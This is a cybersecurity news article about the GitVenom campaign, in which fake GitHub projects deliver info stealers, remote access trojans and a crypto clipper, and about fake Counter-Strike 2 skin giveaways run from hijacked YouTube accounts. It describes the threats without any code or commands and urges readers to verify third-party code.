GitVenom Malware
Cybersecurity experts are raising alarms over an ongoing campaign that preys on gamers and cryptocurrency enthusiasts through deceptive open-source projects on GitHub. Dubbed GitVenom, this operation spans hundreds of repositories, all containing fake projects designed to steal sensitive information.
Among the fraudulent projects are an Instagram automation tool, a Telegram bot for managing Bitcoin wallets and a cracked version of Valorant. However, these tools do not function as advertised. Instead, they are traps set by cybercriminals to steal personal and financial data, including cryptocurrency wallet details copied to the clipboard.
Table of Contents
Millions at Risk: A Long-Running Operation
The threatening campaign has led to the theft of at least five bitcoins, valued at approximately $456,600. Researchers believe the operation has been active for over two years, with some deceptive repositories dating back to that period. The most significant number of infection attempts has been recorded in Russia, Brazil, and Turkey, though the impact could be far-reaching.
A Multi-Language Threat with a Single Goal
The fraudulent GitHub projects are written in multiple programming languages, including Python, JavaScript, C, C++ and C#. Despite the variety, the objective remains the same: executing a hidden payload that downloads additional unsafe components from an attacker-controlled GitHub repository.
One of the primary threats is a Node.js-based information stealer that extracts sensitive data such as saved passwords, banking details, cryptocurrency wallet credentials and browsing history. This data is compressed into a .7z archive and secretly transmitted to the attackers via Telegram.
Remote Takeover and Crypto Theft
Aside from collecting credentials, the fake GitHub projects also deploy remote administration tools like AsyncRAT and the Quasar RAT. These programs allow cybercriminals to take full control of infected devices and execute commands remotely.
Additionally, a specialized type of malware known as a clipper is used to hijack cryptocurrency transactions. When a victim copies a crypto wallet address, the malware swaps it with an attacker-controlled address, diverting funds without the user's knowledge.
The Danger of Fake Open-Source Projects
With millions of developers relying on platforms like GitHub, threat actors continue to use fake software as an effective infection method. This underscores the importance of scrutinizing third-party code before integrating it into any project. Running unverified code without proper analysis could expose users to severe security risks.
Before executing any open-source script, it is essential to thoroughly examine its contents, verify its source, and ensure that it does not perform unauthorized actions. Caution is the best defense against such deceptive campaigns.
E-Sports Tournaments Targeted by Fraudsters
In a related development, cybersecurity researchers have uncovered another scheme targeting Counter-Strike 2 (CS2) players during major e-sports events such as IEM Katowice 2025 and PGL Cluj-Napoca 2025.
Fraudsters have hijacked YouTube accounts to impersonate well-known professional players like S1mple, NiKo and Donk. By posing as these figures, cybercriminals lure unsuspecting fans into fake CS2 skin giveaways. Victims who fall for the tactic risk losing their Steam accounts, cryptocurrency holdings and valuable in-game items.
Stay Vigilant against Online Deception
Both the GitVenom operation and the fraudulent CS2 giveaways highlight the growing sophistication of cyber threats targeting gamers and cryptocurrency investors. As these schemes evolve, staying vigilant, verifying sources, and practicing cybersecurity best practices remain critical in avoiding online traps.
